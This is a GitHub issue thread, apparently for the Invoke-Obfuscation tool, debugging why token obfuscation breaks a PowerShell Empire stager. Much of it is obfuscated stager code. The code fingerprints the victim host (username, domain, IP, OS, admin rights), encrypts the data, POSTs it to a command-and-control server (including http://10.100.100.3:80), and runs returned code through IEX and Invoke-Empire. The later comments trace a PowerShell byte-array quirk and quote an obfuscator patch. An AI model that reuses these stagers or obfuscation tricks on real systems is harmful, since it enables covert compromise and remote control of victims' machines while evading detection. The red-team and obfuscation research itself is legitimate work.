)."VA`LuE"::"u`SEma`ChIne`KEys`T`OrE";${rs} = NeW-OBjECT ("{13}{10}{7}{8}{3}{11}{6}{5}{14}{4}{0}{12}{1}{2}{9}"-f 'yPTOSErvi','Ovi','de','C','ACR','p','Y','C','URITY.','r','M.SE','r','cEPR','SYsTe','TogRAPHY.RS') -ARGUMentLIST 2048,${c`sP};${R`k}=${Rs}."T`o`xmLstrINg"(${fAL`SE});${i`D}=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789"."tOC`h`ARaRR`AY"()|Get-Random -Count 8);${I`B}=${E}."Ge`Tby`Tes"(${rK});${e`B}=${I`V}+${a`ES}."C`ReAtee`NCrYP`ToR"()."TRansFoR`Mfi`Na`lbLo`CK"(${Ib},0,${iB}."leNG`Th");${EB}=${e`B}+${H`mAc}."cOMpU`TEHa`sH"(${E`B})[0..9];if(-NoT ${WC}) {${Wc}=NeW-OBjeCt ("{4}{1}{2}{3}{0}"-f 'iEnt','YSTEM.N','Et.W','ebCl','S');${W`c}."P`ROxy" =  (GEt-VaRIABLe  ("{0}{1}" -f'3E1','s')  -vAlu  )::"Ge`TsysTEMWE`B`p`RO`XY"();${W`c}."pr`OXy"."cRED`enT`IALS" =  ${9`Px}::"DeF`Au`ltCrE`DEN`TiaLs";}if (${C`u`Stom`heAders} -ne "") {${HE`A`dErs} = ${c`u`sT`OMHea`DErS} -SpLIt ',';${he`A`DERs} | FOREACH-OBjEcT {${HeA`DeR`KeY} = ${_}."s`PlIT"(':')[0];${he`Ad`eRvAl`ue} = ${_}."sPL`It"(':')[1];${wC}."HEA`d`eRS"."A`DD"(${hEAdEr`k`ey}, ${h`eADerv`ALUE});}}${WC}."He`ADErs"."A`dD"("User-Agent",${U`A});${Iv}= (gcI ("Va"+"Ri"+"aBLE:h4ys"+"F")  )."vAl`UE"::"g`eTbyt`eS"($(GeT-RandOm));${d`Ata} = ${e}."gEtBY`TeS"(${i`d}) + @(0X01,0x02,0X00,0X00) +  ( GeT-vARIAbLE ("{0}{1}" -f'H4y','sF') )."VAl`Ue"::"G`ETbYT`Es"(${EB}."L`ENgtH");${Rc`4P} = CONVertTO-RC4BYTeStrEam -RCK $(${IV}+${S`Kb}) -IN ${da`TA};${Rc`4P} = ${iv} + ${RC`4P} + ${E`B};${r`AW}=${wc}."UPLO`AddA`Ta"(${S}+"/news.php","POST",${RC`4P});${D`e}=${e}."gETsTR`ing"(${R`S}."DeCR`Ypt"(${r`AW},${fA`L`Se}));${nO`NCe}=${DE}[0..15] -JOiN '';${k`EY}=${D`E}[16..${dE}."lEn`G`Th"] -JoIn '';${NON`CE}=[String]([LONG]${n`o`NCe} + 1);${a`Es}=NEw-ObjeCt ("{9}{0}{3}{2}{10}{4}{5}{6}{8}{1}{7}"-f'T','ovID','cuRI','EM.SE','rApHy','.A','EsCrypToSERvIce','eR','PR','SYS','TY.CRypTog');${I`V} = [BYtE] 0..255 | Get-RANdOM -COuNT 16;${a`es}."Mo`De"="CBC";${a`es}."K`ey"=${E}."G`etbyTEs"(${k`Ey});${a`es}."iv" = ${i`V};${i}=${NO`N`cE}+'|'+${S}+'|'+ ( Dir  ("{2}{3}{0}{1}"-f'iABlE:2KU9','av','va','R')  )."v`ALue"::"usERdo`maI`N`NaMe"+'|'+  (  GCI  ('vArIABL'+'E:2'+'k'+'U9aV') )."v`ALUe"::"US`Ern`AMe"+'|'+  (  VARiAbLe ("{0}{1}"-f'2','ku9aV')  )."vA`lUE"::"MAch`iNen`A`ME";${p}=(gwMi ("{2}{5}{4}{6}{0}{1}{3}{7}"-f 'ra','Ti','WIN32_NeTWO','o','f','RKAdapTERCon','IGu','N')|WHeRE{${_}."I`padDRe`Ss"}|SeLECT -ExPAnD ("{1}{2}{0}"-f 'S','IPADD','ReS'));${I`P} = @{${t`RUe}=${p}[0];${f`AlSE}=${P}}[${p}."LEng`TH" -Lt 6];iF(!${i`P} -or ${I`P}."t`Rim"() -Eq '') {${I`p}='0.0.0.0'};${i}+="|$ip";${i}+='|'+(GeT-WMIObjECT ("{3}{1}{0}{2}{4}" -f's','RATInGSy','te','WiN32_Ope','m'))."n`Ame"."SpL`it"('|')[0];if((  ( gET-vaRiAbLE  ("{0}{1}" -f '2ku9','AV') -VALUEOnLy)::"uSE`RNA`Me")."t`O`LoweR"() -eq "system"){${I}+="|True"}else {${I} += '|' +([Security.Principal.WindowsPrincipal]   ( GCI  ("{4}{1}{0}{2}{3}" -f 'aBlE:5','i','2','F6Z4','vAr') )."va`lUe"::"GeTcUR`R`ENT"())."isiNr`O`le"([Security.Principal.WindowsBuiltInRole] "Administrator")}${N}= ${r`Sj}::"geT`c`uRren`Tp`ROCEsS"();${i}+='|'+${n}."PROCES`SnA`ME"+'|'+${n}."iD";${I} += "|powershell|" + ${PS`Ve`RsiOn`T`AbLE}."ps`Ve`RsIoN"."MaJ`OR";${I`B2}=${e}."ge`TBYt`es"(${I});${e`B2}=${I`V}+${A`es}."crE`AT`e`EnCrY`Ptor"()."T`R`AnSformFiNA`Lb`LOCK"(${i`B2},0,${i`B2}."L`eNgth");${hm`Ac}."k`ey" = ${E}."G`E`TByTes"(${k`EY});${E`B2} = ${E`B2}+${hM`Ac}."cOmpUT`E`HaSh"(${E`B2})[0..9];${I`V2}=  ${h`4y`sF}::"G`etBYt`eS"($(Get-RaNDOM));${D`Ata2} = ${e}."GE`Tbyt`eS"(${i`d}) + @(0x01,0X03,0x00,0x00) +  ( GET-vArIabLe  ('H4y'+'SF')  -Valueo  )::"gE`T`ByTes"(${E`B2}."LE`N`GTh");${r`c4P2} = CoNvERTTO-RC4BYTEStrEam -RCK $(${I`V2}+${S`Kb}) -IN ${D`At`A2};${Rc`4p2} = ${I`V2} + ${r`C4`p2} + ${e`B2};if (${cU`sT`o`MheA`DErs} -ne "") {${Hea`DE`RS} = ${CUsto`mh`EAdERS} -SpLIT ',';${hea`derS} | ForEAcH-ObJECT {${HeA`Derk`EY} = ${_}."S`PLIt"(':')[0];${HeA`d`eRv`ALUE} = ${_}."s`Plit"(':')[1];${Wc}."HeaDE`RS"."A`dd"(${h`ea`d`eRKEY}, ${h`e`AD`eRVAlUe});}}${wC}."hE`A`derS"."a`Dd"("User-Agent",${U`A});${R`AW}=${W`C}."U`PL`oAddA`TA"(${s}+"/login/process.php","POST",${R`C4P2});IEX $( ${E}."gET`StrI`NG"($(DECRYpT-BYTes -KEy ${k`Ey} -In ${R`AW})) );${a`es}=${Nu`LL};${s2}=${N`ULL};${WC}=${N`ull};${E`B2}=${NU`ll};${R`AW}=${N`uLl};${iv}=${nu`LL};${W`c}=${n`ull};${i}=${nU`ll};${i`B2}=${N`Ull};  ( geT-vaRIaBLe  ("{1}{0}"-f 'c0A','j'))."VAL`ue"::"cO`Ll`eCt"();Invoke-Empire -Servers @((${S} -split "/")[0..2] -join "/") -StagingKey ${SK} -SessionKey ${K`Ey} -SessionID ${i`D};}Start-Negotiate -s "$ser" -SK '3c6e0b8a9c15224a8228b9a98ca1531d' -UA ${U};

I'll be doing some more research into this and see if I can get you some more output when the obfuscated script is actually executing. I thought I would go ahead and post to see if you are able to spot anything that stands out to you.

danielbohannon commented 7 years ago

If you can provide any error details then that would be helpful as well. Thanks man!

cobbr commented 7 years ago

I have a (slightly) minimized version of an obfuscated stager that reproduces part of the issue. The issue appears to be with the $S variable being casted to a byte array type inside of the ConvertTo-RC4ByteStream function. Within the calling function, $S is defined as a string. In the non-obfuscated version of the script, $S remains a string in the calling function after calling ConvertTo-RC4ByteStream. In the following obfuscated version of the script, $S becomes a byte array in the calling function after calling ConvertTo-RC4ByteStream:

 .("{1}{0}" -f 'et','S') ("{0}{1}" -f'b8','hR')  ( [typE]("{3}{0}{4}{1}{2}"-f 'eC','S','semblY','ReFL','TIOn.A'))  ;
 ${a`q`3DN}  =  [TYPe]("{2}{0}{3}{1}"-F 'Y','t.EnCODInG','s','STEM.tex');
 &("{0}{1}{3}{2}"-f'seT','-','iABle','VAR')  ("{0}{1}" -f 'Ua2','4')  ( [TYPe]("{1}{4}{6}{7}{8}{0}{2}{3}{5}{9}" -f'OGrAp','syst','Hy.','C','Em','spPROVid','.Se','cURITy.C','Rypt','eRfLagS'));   
 &('Sv') ("{0}{1}" -f 'vm','D') ( [tyPE]("{3}{1}{2}{4}{5}{0}"-F 'St','sT','eM.nET.w','SY','Eb','RequE') );
 .("{1}{2}{0}"-f 'TEm','S','ET-I')  ("VAriAbL"+"e"+":GPh5")  (  [tyPE]("{6}{2}{5}{7}{0}{3}{1}{4}"-f'nT','ach','sTEm.','iALC','E','nET','SY','.cREDe')  ) ;
 .("{1}{0}{2}"-f 'V','seT-','ariAbLe') ("{0}{1}"-f '1','nMD') ( [tyPE]("{2}{3}{0}{1}"-f'Men','t','E','NViRoN'))  ;
 ${G`D`TLr3} =  [Type]("{1}{7}{2}{3}{4}{5}{0}{6}" -F 'iNDOW','sE','priN','Cip','AL','.w','SIDENtity','CURiTy.')  ;
 &("{0}{1}{2}"-f'S','ET-IT','EM') ("{2}{1}{0}{3}" -f ':','iabLE','vAR','8DB') ( [TypE]("{4}{3}{2}{1}{0}{5}"-f'rO','.P','cs','.DiAGnoStI','System','CESS')  )  ;
 .("{0}{1}"-f'Set-','ITem')  ('varI'+'ABLE:wb'+'Z'+'7o'+'d')  ([TYPE]("{0}{2}{1}{3}"-f 'B','tCOnvErtE','i','r')  )  ;
 ${4Sm`g9}  = [type]('Gc') ;
 fUncTION staRt`-NEGO`TI`ATE {
    PARam(${S},${Sk},${uA}=("{0}{16}{5}{6}{14}{2}{13}{12}{1}{3}{11}{9}{17}{7}{15}{10}{4}{8}" -f 'MoZIlLa/5.','OW6','S NT 6.1','4; TrI',' GeCK',' ','(WI','R','O','.0',':11.0) LikE','dENT/7',' W',';','NdoW','V','0','; '))
    Write-Host s value at start of start-negotiate: $s
    FunCtiOn cOnveRTto`-RC4By`TeS`Tr`eAm {
        ParAM (${R`CK}, ${iN})bEgIN {
            Write-Host s type at start of convertto-rc4bytestream: $S.GetTYpe();
            [BYTE[]] ${S} = 0..255;${J} = 0;
            Write-Host s type after cast in convertto-rc4bytestream: $S.GetType();
            0..255 | .("{1}{0}{2}{3}"-f 'Ea','FOR','ch-Ob','jecT') {
                ${J} = (${J} + ${S}[${_}] + ${r`ck}[${_} % ${r`Ck}."LEN`Gth"]) % 256;
                ${S}[${_}], ${S}[${j}] = ${S}[${J}], ${S}[${_}];
            };
            ${i} = ${J} = 0;
        }
        ProCESs {
            FoREAch(${B`yte} In ${iN}) {
                ${i} = (${i} + 1) % 256;
                ${j} = (${j} + ${S}[${I}]) % 256;
                ${s}[${I}], ${s}[${j}] = ${s}[${J}], ${S}[${i}];
                ${by`Te} -BXOR ${s}[(${S}[${i}] + ${S}[${j}]) % 256];
            }
        }
    }
    ${ErrO`R`AcT`ioNp`REFE`REncE} = ("{4}{2}{3}{0}{1}" -f 'tin','ue','n','tlyCon','Sile');
    ${E}= ( &("{2}{0}{1}" -f'ri','aBLe','vA') ("{0}{1}" -f 'Aq','3dn') -vALUEOn)::"a`sciI";
    ${cUS`TOm`HEAd`eRs} = "";
    ${S`KB}=${e}.("{0}{2}{1}"-f'G','es','ETByt').Invoke(${sk});${A`eS}=.("{0}{1}{2}" -f 'Ne','W','-OBJECt') ("{10}{11}{6}{5}{1}{13}{2}{0}{9}{12}{7}{4}{3}{8}"-f 'PToGra','y.','RY','OVi','vicEPr','Rit','em.SeCU','ypTOSER','der','phY.A','S','ysT','eSCR','C');
    ${i`V} = [BYTe] 0..255 | .("{2}{0}{1}"-f 'E','T-RANDOM','G') -cOUnt 16;
    ${A`es}."m`oDe"="CBC";
    ${A`Es}."k`ey"=${s`KB};
    ${A`Es}."iv" = ${iV};
    ${h`mac} = &("{0}{1}{2}"-f 'NEw-Obje','C','T') ("{9}{4}{5}{2}{1}{7}{8}{0}{6}{3}"-f 'HMACSH','eCuriTy.CryPt','S','6','St','Em.','A25','ogRa','phy.','Sy');
    ${hm`AC}."k`ey" = ${S`KB};${C`Sp} = .("{3}{2}{1}{0}"-f't','bJec','EW-O','N') ("{8}{1}{3}{9}{0}{5}{7}{6}{2}{4}"-f'RyPT','Em','am','.Secu','eTeRS','Ograp','PAR','Hy.CsP','SYst','RIty.C');${c`sp}."F`laGS" = ${C`sP}."fLA`Gs" -BOR   ${Ua`24}::"U`SEm`AChinEkE`ySToRe";
    ${r`S} = .("{3}{2}{1}{0}"-f 'CT','jE','-OB','New') ("{6}{3}{2}{1}{0}{4}{8}{7}{9}{5}"-f 'A','GR','.SEcurITy.CrYPTO','ysTEM','P','dEr','S','ACRY','Hy.RS','PtoSErVIcEPrOVI') -ARGuMEntLisT 2048,${C`SP};
    ${Rk}=${R`s}.("{2}{3}{0}{1}" -f'mLStr','INg','T','OX').Invoke(${Fal`SE});
    ${iD}=-join(("{2}{3}{0}{1}{6}{5}{4}"-f 'NPRSTU','VWXY','ABCDEFG','HKLM','89','234567','Z1').("{1}{0}{2}" -f 'rA','ToCha','rray').Invoke()|.("{2}{0}{1}" -f'do','m','Get-Ran') -Count 8);
    ${iB}=${E}.("{1}{0}{2}"-f 'e','GeTbyT','S').Invoke(${R`k});${e`B}=${I`V}+${a`Es}.("{1}{0}{2}{3}"-f 'NC','CREATeE','RypTO','r').Invoke().("{0}{3}{1}{5}{4}{2}" -f'TrAN','O','AlBLocK','sf','FIn','rM').Invoke(${IB},0,${I`B}."L`ENg`TH");
    ${e`B}=${eB}+${Hm`AC}.("{1}{0}{2}" -f'pU','COM','TeHAsH').Invoke(${eb})[0..9];
    iF(-NOt ${W`c}) {${W`C}=.("{1}{0}{2}" -f 'bJ','NeW-O','eCT') ("{4}{0}{1}{2}{3}"-f'STE','m.N','ET.WeBCL','iEnT','SY');
    ${Wc}."pR`oXY" =   ${v`Md}::("{3}{4}{1}{0}{2}" -f 'O','bPr','XY','GetSYStEM','We').Invoke();
    ${wC}."PR`Oxy"."cre`DEN`TIALS" =  ${GP`H5}::"DefAuLtcreDE`N`Ti`ALS";}
    ${wc}."H`E`ADERS".("{0}{1}"-f'Ad','d').Invoke(("{2}{0}{1}"-f 'r-A','gent','Use'),${U`A});
    ${I`V}=  ${wBZ`7`od}::("{1}{2}{0}"-f 'TeS','GetB','y').Invoke($(&("{1}{3}{0}{2}" -f 'Nd','Get-R','oM','a')));
    ${d`AtA} = ${e}.("{0}{1}" -f 'GETbYTE','s').Invoke(${iD}) + @(0X01,0X02,0x00,0x00) +  ${wbZ7`od}::("{1}{0}" -f'BYtES','GET').Invoke(${eB}."L`enGTH");
    ${R`C4p} = .("{3}{6}{0}{5}{1}{2}{4}"-f 'TT','-RC4BytES','TreA','COn','m','O','VEr') -RCK $(${iV}+${s`kB}) -In ${DA`TA};
    ${w`c}."H`e`AdeRS".("{1}{0}" -f'dd','A').Invoke(("{2}{1}{0}"-f 'nt','r-Age','Use'),${ua});
    Write-Host value of s at end of start-negotiate: $S
    $S = 'http://10.100.100.3:80'
    Write-Host type of s at end of start-negotiate: $S.GetType();
    $one = ${S}+("{2}{1}{3}{0}"-f '.php','in/pr','/log','ocess')
    $two = ("{0}{1}"-f'POS','T')
    $three = ${rC`4P2}
    ${r`AW}=${WC}.("{0}{1}{3}{2}"-f 'Uploa','d','a','Dat').Invoke($one,$two,$three);
    ${A`es}=${n`ULL};${S2}=${n`ULL};${WC}=${nu`lL};${E`B2}=${N`Ull};${R`Aw}=${Nu`Ll};
    ${i`V}=${nU`ll};${WC}=${n`ULl};${I}=${n`uLL};${i`B2}=${nu`Ll};
    ${4`SmG9}::("{0}{1}" -f 'CO','llEcT').Invoke();
    &("{2}{1}{0}{3}" -f 'e-E','ok','Inv','mpire') -Servers @((${S} -split "/")[0..2] -join "/") -StagingKey ${s`K} -SessionKey ${K`Ey} -SessionID ${Id};
}
  $ser='http://10.100.100.3:80'
  .("{3}{0}{2}{1}" -f'-Negot','ate','i','Start') -s "$ser" -SK ("{6}{1}{5}{4}{9}{8}{0}{7}{3}{2}"-f '&:','!+fk','x/h','o>S','VAr','8ZH<','16','s-9,','mb=G','u0z') -UA ${u};

Here is the output of that script, which shows how $S has become a byte array:

PS> ".\stage.ps1" | iex
s value at start of start-negotiate: http://10.100.100.3:80
s type at start of convertto-rc4bytestream: System.String
s type after cast in convertto-rc4bytestream: System.Byte[]
value of s at end of start-negotiate: 88 148 170 19 227 179 206 156 132 225 178 84 171 124 209 23 173 102 10 71 22 98 32
 184 129 73 214 30 68 188 80 163 90 175 28 139 213 251 94 142 248 27 17 95 121 5 152 34 62 66 50 182 93 2 87 70 154 167
151 234 15 136 122 112 145 37 63 60 79 114 46 252 26 194 72 196 35 134 75 138 31 39 246 197 97 242 158 6 107 81 144 24 1
25 41 133 159 54 164 205 25 9 76 45 103 165 236 29 47 12 254 44 7 104 92 91 140 237 186 3 100 48 216 116 203 135 245 115
 52 57 220 210 187 69 208 137 33 195 110 241 153 49 128 96 172 218 1 217 222 221 67 160 130 106 249 36 113 89 223 117 24
0 16 244 14 42 224 231 243 21 226 108 168 191 58 109 78 119 131 64 211 192 77 4 183 207 149 157 141 198 111 228 201 123
238 176 250 199 253 20 43 59 162 204 83 215 120 8 86 65 185 40 55 247 212 255 127 193 85 118 230 174 82 155 180 0 74 181
 53 229 101 233 202 38 51 61 166 126 143 219 13 189 232 235 200 150 147 161 146 18 11 190 99 105 56 169 177 239
type of s at end of start-negotiate: System.Byte[]

I can solve this by changing the name of the $S variable to something else within ConvertTo-RC4ByteStream, but it seems that if this works as-is unobfuscated, it should work obfuscated as well.

This appears to be a problem with command TOKEN obfuscation, because this is solved by disabling it.

There seems to be an additional problem with string TOKEN obfuscation when trying to obfuscate the stager, but I think it is a separate issue from the command TOKEN issue discussed here.

cobbr commented 7 years ago

So this one was especially fun to debug, but I think I nailed down the issue. The problem appears when using the 'Invoke' style command token obfuscation. If the argument passed to the Invoke() function is a byte array, for some reason it's interpreted as an array of parameters instead of a single parameter that is an array.

To me, this seems like an actual issue with PowerShell itself, as this doesn't seem to happen with any other type of array besides byte arrays. But aside from a fix to PowerShell, a way to fix this is passing the byte array with this notation: "Method".Invoke(@(,$byteArrayVar)).

I'm a little uncertain on how to implement that in Invoke-Obfuscation as you would have to have some sort of 'state' where we could detect a byte array as the next token while doing Invoke style obfuscation on command tokens. You might have some more insight on how best to implement a long-term fix, being more familiar with the code base. For now, I hacked in some exceptions for method names that take byte arrays as parameters and were giving me trouble:

    # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value.
    $SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString)

    If(($Token.Content.ToLower() -eq 'invoke') `
    -OR ($Token.Content.ToLower() -eq 'computehash') `
    -OR ($Token.Content.ToLower() -eq 'tobase64string') `
    -OR ($Token.Content.ToLower() -eq 'tostring') `
    -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) `
    -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) `
    -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')')))))))
    {
        # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. 
        $PrevLength = $ScriptString.Length
cobbr commented 6 years ago

Not a real 'fix' but hacky exceptions included in: 950785e5f846fb0e8d3be8484d2ba466c2340469

danielbohannon commented 6 years ago

Thanks for the fix, @cobbr!